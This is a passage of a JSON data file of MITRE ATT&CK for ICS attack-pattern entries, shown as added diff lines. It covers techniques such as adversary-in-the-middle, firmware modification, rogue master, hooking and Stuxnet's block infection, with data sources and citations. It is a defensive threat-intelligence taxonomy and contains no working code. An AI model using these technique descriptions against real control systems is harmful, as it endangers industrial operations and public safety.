This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0870", + "external_id": "T0870" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. 
(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) \n\nAn AiTM attack may allow an adversary to perform the following attacks: \n[Block Reporting Message](https://attack.mitre.org/techniques/T0804), [Spoof Reporting Message](https://attack.mitre.org/techniques/T0856), [Modify Parameter](https://attack.mitre.org/techniques/T0836), [Unauthorized Command Message](https://attack.mitre.org/techniques/T0855)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Conrad Layne - GE Digital" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Windows Registry: Windows Registry Key Modification", + "Service: Service Creation", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0830", + "external_id": "T0830" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 
2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Gabriel Sanchez October 2017", + "description": "Gabriel Sanchez 2017, October Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark Retrieved. 2020/01/05 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploitation for Evasion", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. \n\nAdversaries may have prior knowledge through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888) about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. 
There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious [System Firmware](https://attack.mitre.org/techniques/T0857).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0820", + "external_id": "T0820" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Control", + "description": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. 
As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0827", + "external_id": "T0827" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 
2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Change Program State", + "description": "Adversaries may attempt to change the state of the current program on a control device. 
Program state changes may be used to allow for another program to take over control or be loaded onto the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0875", + "external_id": "T0875" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-13T13:32:08.619Z", + "name": "Hooking", + "description": "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)\n\nOne type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Process: Process Metadata", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0874", + "external_id": "T0874" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Hooking Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1179/" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Control Device Identification", + "description": "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. 
By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0808", + "external_id": "T0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Program Organization Units", + "description": "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)\n \nStuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). 
For example, the following sequence of actions is performed when OB1 is infected (Citation: Stuxnet - Symantec - 201102):\n*Increase the size of the original block.\n*Write malicious code to the beginning of the block.\n*Insert the original OB1 code after the malicious code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0844", + "external_id": "T0844" + }, + { + "source_name": "Guidance - IEC61131", + "description": "John Karl-Heinz. (n.d.). Programming Industrial Automation Systems. Retrieved October 22, 2019.", + "url": "http://www.dee.ufrj.br/controle%20automatico/cursos/IEC61131-3%20Programming%20Industrial%20Automation%20Systems.pdf" + }, + { + "source_name": "PLCBlaster - Spenneberg", + "description": "Spenneberg, Ralf, Maik Brüggemann, and Hendrik Schwartke. (2016, March 31). Plc-blaster: A worm living solely in the plc.. Retrieved September 19, 2017.", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + }, + { + "source_name": "Stuxnet - Symantec - 201102", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). 
Retrieved September 22, 2017.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Graphical User Interface", + "description": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.\n\nIf physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Module: Module Load", + "Command: Command Execution", + "Logon Session: Logon Session Creation", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/techniques/T0823", + "external_id": "T0823" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:18:41.277Z", + "name": "Rogue Master", + "description": "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. \n\nIn the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Asset: Asset Inventory" + ], + "type": "attack-pattern", + "id": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0848", 
+ "external_id": "T0848" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Native API", + "description": "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. \n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. 
For example, functions such as memcpy and direct operations on memory registers can be used to modify user and system memory space.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0834", + "external_id": "T0834" + }, + { + "source_name": "The MITRE Corporation May 2017", + "description": "The MITRE Corporation 2017, May 31 ATT&CK T1106: Native API Retrieved. 2021/04/26 ", + "url": "https://attack.mitre.org/techniques/T1106/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Availability", + "description": "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. 
Lee) (Citation: Tyson Macaulay) \n\nAdversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.\n\nIn the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th. (Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0826", + "external_id": "T0826" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 
2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Theft of Operational Information", + "description": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. 
(Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0882", + "external_id": "T0882" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "System Firmware", + "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. 
\n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. (Citation: Basnight, Zachry, et al.)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Firmware: Firmware Modification", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0857", + "external_id": "T0857" + }, + { + "source_name": "Basnight, Zachry, et al.", + "description": "Basnight, Zachry, et al. 2013 Retrieved. 
2017/10/17 ", + "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Masquerading", + "description": "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. \n\nApplications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Scheduled Job: Scheduled Job Creation", + "Service: Service Creation", + "Command: Command Execution", + "File: File Modification", + "Service: Service Modification", + "Process: Process Metadata", + "File: File Metadata", + "Scheduled Job: Scheduled Job Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "created": "2020-05-21T17:43:26.506Z", + 
